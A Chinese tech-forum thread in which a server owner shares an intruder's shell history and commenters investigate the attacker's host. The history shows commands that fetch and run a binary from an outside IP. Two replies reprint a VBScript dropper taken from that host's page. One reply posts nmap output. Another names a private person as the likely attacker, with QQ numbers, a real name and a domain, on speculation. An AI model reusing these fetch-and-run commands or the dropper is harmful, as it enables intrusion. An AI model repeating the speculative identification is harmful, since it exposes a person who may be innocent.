从 17:01 开始
为了防止上面图片挂掉、文本如下
21 2020-01-06 09:44:38 crontab -e
22 2020-01-06 09:45:16 reboot
23 2020-01-06 09:47:02 top
24 2020-01-06 17:01:03 top
25 2020-01-06 17:01:11 ls -l /proc/3557/exe
26 2020-01-06 17:01:17 netstat -atulnp
27 2020-01-06 17:01:40 ls -l /proc/1211/exe
28 2020-01-06 17:01:44 kill -9 1211
29 2020-01-06 17:01:46 crontab -l
30 2020-01-06 17:01:47 crontab -r
31 2020-01-06 17:01:48 crontab -l
32 2020-01-06 17:01:50 cd /usr/bin/
33 2020-01-06 17:01:57 rm -rf ftucwfvnpb
34 2020-01-06 17:02:00 netstat -atulnp
35 2020-01-06 17:02:03 w
36 2020-01-06 17:02:05 cd /root/
37 2020-01-06 17:02:07 cd /bin/
38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java
39 2020-01-06 17:02:19 rm -rf java.1
40 2020-01-06 17:02:20 cd /root/
41 2020-01-06 17:02:21 cd /opt/
42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java
43 2020-01-06 17:02:35 chmod 777 java
44 2020-01-06 17:02:36 ./java
45 2020-01-06 17:02:38 cd /root/
46 2020-01-06 17:02:41 ps -xua
47 2020-01-06 17:03:28 netstat -atulnp
48 2020-01-06 17:03:47 kill -9 4689
49 2020-01-06 17:03:51 netstat -atulnp
50 2020-01-06 17:04:02 cd /etc/
51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163
52 2020-01-06 17:04:15 rm -rf java
53 2020-01-06 17:04:16 cd /root/
54 2020-01-06 17:04:17 cd /bin/
55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java
56 2020-01-06 17:04:28 rm -rf java.1
57 2020-01-06 17:04:30 cd /root/
58 2020-01-06 17:04:31 cd /opt/
59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java
60 2020-01-06 17:04:36 chmod 777 java
61 2020-01-06 17:04:39 ./java
62 2020-01-06 17:04:42 cd /root/
63 2020-01-06 17:04:44 netstat -atulnp
64 2020-01-06 17:04:51 ifconfig
65 2020-01-06 17:04:54 history
66 2020-01-06 17:05:01 netstat -atulnp
67 2020-01-06 17:05:42 cd /ro
68 2020-01-06 17:05:43 cd /root/
69 2020-01-06 17:05:46 history
70 2020-01-06 17:05:53 ifconfig
71 2020-01-06 17:05:54 history
72 2020-01-06 17:05:58 w
73 2020-01-06 17:06:00 history
74 2020-01-06 17:06:24 ifconfig
75 2020-01-06 17:06:27 history
76 2020-01-06 17:06:29 history
77 2020-01-06 17:06:29 history
附上这两天我自己服务器的资源截图、应该还是盗走了点东西、不过还好、没啥重要的
1
defunct9 2020-01-07 09:52:44 +08:00
有意思
|
2
dothis OP 里面还有这个人对应的 云服务器地址 手动狗头
|
3
ihciah 2020-01-07 09:54:26 +08:00 via iPhone
这是啥机器,挖出来的币有人工的时间值钱吗
|
4
mangoDB 2020-01-07 09:56:07 +08:00
感觉对方功夫不到家
|
5
avalon0624 2020-01-07 10:01:13 +08:00
居然用的还是国内的 ip 做,忘了服务器要实名的么?
|
6
dapang1221 2020-01-07 10:01:41 +08:00
这这这…纯手动的吗,真就服务器一日游啊,翻遍了。。。
|
7
yEhwG10ZJa83067x 2020-01-07 10:03:31 +08:00
http://101.201.76.232:8082
可以打开 |
8
oneisall8955 2020-01-07 10:04:58 +08:00 via Android
有趣有趣
|
9
moonheart 2020-01-07 10:10:23 +08:00 1
|
10
dothis OP @ihciah 我是腾讯云 2 核 8G5M 的机器
@mangoDB 哈哈、是的、我已经够菜了、他比我还菜 @avalon0624 是的、不过这不是最骚的、最骚的是还能访问、笑死了 @dapang1221 我也感觉、纯手动、第一次挖矿搞的还挺像样子的、这一次直接手动、并且最后好像是放弃了?因为这次好像没有成功植入病毒、只是腾讯云那边给了个提醒 |
12
afirefish 2020-01-07 10:22:32 +08:00
北京 阿里云?
|
13
ReZer0 2020-01-07 10:23:44 +08:00
话说我好奇的点在于是怎么被黑进去的……
|
14
rongyiran 2020-01-07 10:27:31 +08:00
用的是肉鸡控制你的啊.
|
15
gearfox 2020-01-07 10:28:13 +08:00
还是个爱打 cs 的朋友
|
16
dothis OP |
17
mango88 2020-01-07 10:54:43 +08:00
惊了,CS
|
18
LengthMin 2020-01-07 10:56:02 +08:00
BT 是宝塔吗?
|
19
afirefish 2020-01-07 10:58:56 +08:00
@dothis BT 是宝塔吗?我一台腾讯云的服务器上面也跑了 BT,目前暂时还没有被黑过(或者是我菜,不知道被黑了)。不过我一般在腾讯云的安全组里面吧宝塔管理面板和 SSH 的端口都关了的,要用的时候再打开。
|
21
dothis OP |
22
different 2020-01-07 11:10:10 +08:00
你也挺有意思,你的重点在于别人有多菜,而不是你的服务器怎么被别人黑进来了?
|
23
LengthMin 2020-01-07 11:14:48 +08:00
还有一个:之前看过一篇文章,因为宝塔里开启的 phpmyadmin 的 888 端口也是暴露在公网的,所以就怎么怎么怎么就进去 shell 了
|
24
dothis OP |
25
opengps 2020-01-07 11:25:10 +08:00
公网环境就是这么恶劣,学学防御吧,最基本的:换端口,强密码,严格的防火墙
|
26
ZRS 2020-01-07 11:40:03 +08:00 via iPhone
怎么摸进来的
|
27
dorothyREN 2020-01-07 11:49:27 +08:00
我 sqlserver 1 号一大早被删库了。。。
|
28
shawshi 2020-01-07 12:02:51 +08:00
估计那个服务器还是肉鸡
|
29
shawshi 2020-01-07 12:03:03 +08:00
估计那个服务器也是肉鸡
|
30
AmosAlbert 2020-01-07 12:13:40 +08:00
看这操作,你的服务器成靶场了 :)
|
31
guanhui07 2020-01-07 12:26:21 +08:00
阿里云..
|
32
darknoll 2020-01-07 12:48:13 +08:00 1
不是通过密码登录进来的?
|
33
no1xsyzy 2020-01-07 12:49:16 +08:00
http://101.201.76.232:8082 的 “HFS” 页面里面是没有显示 /java 的
但 :80 带 Trojan-Dropper.VBS.Agent (卡巴斯基) 或者叫 TrojanDropper/Ramnit.f (火绒) 让我有点疑惑 直接报给 CNCERT 吧。 |
34
hiya5 2020-01-07 12:53:22 +08:00
他通过密码登录进来的吗
|
35
atonku 2020-01-07 13:21:23 +08:00
你黑不了他的服务器,所以你比他菜。
|
36
lostpg 2020-01-07 13:21:59 +08:00 via Android
感觉这是直接密码登 root 用户进来了,如果再是弱密码,不就是开着大门睡觉了。。。
|
37
dothis OP |
38
Mogugugugu 2020-01-07 13:52:03 +08:00
http://101.201.76.232 是个 nginx 页面,用的是 tomcat 的 fav.ico , 然后右键看一下源码、有意思、
|
39
puzzle9 2020-01-07 14:17:48 +08:00
@Mogugugugu 确实有意思 不过这种病毒对现代浏览器应该失效了把
|
41
songco 2020-01-07 15:16:55 +08:00
Starting Nmap ( https://nmap.org ) at 2020-01-07 09:14 EET
NSE: Loaded 40 scripts for scanning. Initiating Ping Scan at 09:14 Scanning 101.201.76.232 [4 ports] Completed Ping Scan at 09:14, 0.47s elapsed (1 total hosts) Initiating SYN Stealth Scan at 09:14 Scanning 101.201.76.232 [100 ports] Discovered open port 1025/tcp on 101.201.76.232 Discovered open port 139/tcp on 101.201.76.232 Discovered open port 135/tcp on 101.201.76.232 Discovered open port 80/tcp on 101.201.76.232 Discovered open port 3389/tcp on 101.201.76.232 Discovered open port 1027/tcp on 101.201.76.232 Discovered open port 1026/tcp on 101.201.76.232 Completed SYN Stealth Scan at 09:14, 2.94s elapsed (100 total ports) Initiating Service scan at 09:14 Scanning 7 services on 101.201.76.232 Completed Service scan at 09:15, 59.26s elapsed (7 services on 1 host) NSE: Script scanning 101.201.76.232. Initiating NSE at 09:15 Completed NSE at 09:15, 2.96s elapsed Initiating NSE at 09:15 Completed NSE at 09:15, 0.00s elapsed Nmap scan report for 101.201.76.232 Host is up (0.21s latency). Not shown: 77 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.9.12 81/tcp filtered hosts2-ns 111/tcp filtered rpcbind 119/tcp filtered nntp 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 427/tcp filtered svrloc 445/tcp filtered microsoft-ds 515/tcp filtered printer 646/tcp filtered ldp 1025/tcp open msrpc Microsoft Windows RPC 1026/tcp open msrpc Microsoft Windows RPC 1027/tcp open msrpc Microsoft Windows RPC 1029/tcp filtered ms-lsa 3389/tcp open ms-wbt-server Microsoft Terminal Service 4899/tcp filtered radmin 5000/tcp filtered upnp 5101/tcp filtered admdog 5357/tcp filtered wsdapi 5800/tcp filtered vnc-http 5900/tcp filtered vnc 6001/tcp filtered X11:1 49152/tcp filtered unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds Raw packets sent: 182 (7.984KB) | Rcvd: 137 (5.516KB) |
42
randomtree451 2020-01-07 15:30:07 +08:00
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe" WriteData = "" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> |
43
tengyoubiao 2020-01-07 15:50:25 +08:00
这是挂了个感染 HTML 的木马?
|
44
Achiii 2020-01-07 16:43:09 +08:00
试过被利用 tp 漏洞挂马,后来过滤 post 参数关键字解决的
|
45
black11black 2020-01-07 21:23:08 +08:00
老哥,说一下你这个查看用户历史记录的命令是啥呗
|
46
wqshare 2020-01-07 21:31:36 +08:00
看看这老哥的 80 端口页,用 vbs 挂了个马上去,哈哈
|
47
xupefei 2020-01-07 21:44:37 +08:00 via iPhone
不要对公网开 yarn 端口
|
48
rootx 2020-01-07 22:11:35 +08:00
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe" WriteData = "" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> |
49
dorothyREN 2020-01-08 00:55:30 +08:00
@dothis #37 数据库没备份,只有日志,恢复起来贼特么慢,搞了两天才恢复完数据
|
50
msg7086 2020-01-08 01:46:06 +08:00 1
公司服务器装宝塔?佩服佩服。
|
51
HTSdTt3WygdgQQGe 2020-01-08 02:12:03 +08:00 via Android
你马上报案,说数据库丢了价值一个亿的机密资料,让阿里去查
|
52
vvqqdd 2020-01-08 04:11:58 +08:00
这个服务器有个图片,点开是哥🐎,名字叫做 nknmn。。。顾名思义 哈哈
|
53
KasuganoSoras 2020-01-08 04:56:49 +08:00
在他的服务器上看到一张图片叫 “战鹰部落 MC 服务器”,正好我也是开 MC 服务器的,好奇搜了一下,找到了他们的服务器,QQ 群是 139888565,群主 QQ 是 565621504,昵称叫 NullPointerException,结合前面执行的命令以及文件名里面都含有 Java,我觉得八九不离十,楼主有兴趣可以自己去会会他?
|
54
KasuganoSoras 2020-01-08 05:04:08 +08:00 5
https://www.mcbbs.net/thread-675592-1-1.html
2017 年的时候曾经在我的世界中文论坛发过贴说自己的服务器被 DDoS 了 9.6Gbps 流量,然后从他的个人空间找到一个域名 www.zhanyingwl.com ,打开发现 502,是 360 云盾的界面,然后我想了下既然是用的 360 CDN,那这域名肯定有备案吧。然后又去查了一下备案号,果然。 尹伊君 个人 鲁 ICP 备 18039840 号-1 战鹰网络技术站 www.zhanyingwl.com 只能帮你到这里了(笑 |
55
cydian 2020-01-08 06:12:17 +08:00 via Android
@KasuganoSoras 可以打开 不是 502
|
56
webshe11 2020-01-08 08:17:53 +08:00
真就用宝塔呗
|
57
Pzqqt 2020-01-08 08:58:35 +08:00
@xmi 参考 38 楼 病毒是藏在页面源码里的 在页面源码下方有一段恶意 VBScript 代码 可以看出这段代码只对 Windows 系统有影响
|
58
dothis OP @black11black 终端下直接敲 history 就可以看
@msg7086 我自己服务器用的、感觉贼舒服、然后公司的服务器也想用、最后没用起来就凉了、以后不敢用这些东西了、自己玩玩还行 @dorothyREN。。。这就很难受了、我这边有快照、简单很多 @KasuganoSoras 卧槽、老哥稳、多谢了 |
59
qanniu 2020-01-08 08:59:19 +08:00
@KasuganoSoras 大佬 v5
|
60
xiaoxiongmao 2020-01-08 09:14:18 +08:00
@KasuganoSoras 厉害了老哥
|
62
1239305697 2020-01-08 15:26:08 +08:00
|
63
1239305697 2020-01-08 16:08:30 +08:00
https://i.loli.net/2020/01/08/4jzJxGk3Z7LheDU.png 龟龟,我打开了那个地址,然后居然真的就中了。。。
|
64
1239305697 2020-01-08 16:16:01 +08:00
打开了楼上那个 ip 地址而且没被安全软件报毒的建议全盘扫描一下电脑,我的中了。。
|
65
msg7086 2020-01-08 17:14:23 +08:00
|
66
maxbon 2020-01-11 14:16:59 +08:00
这个记录笑死了,最开始跑一遍是发现没跑成功又删掉重下吗
|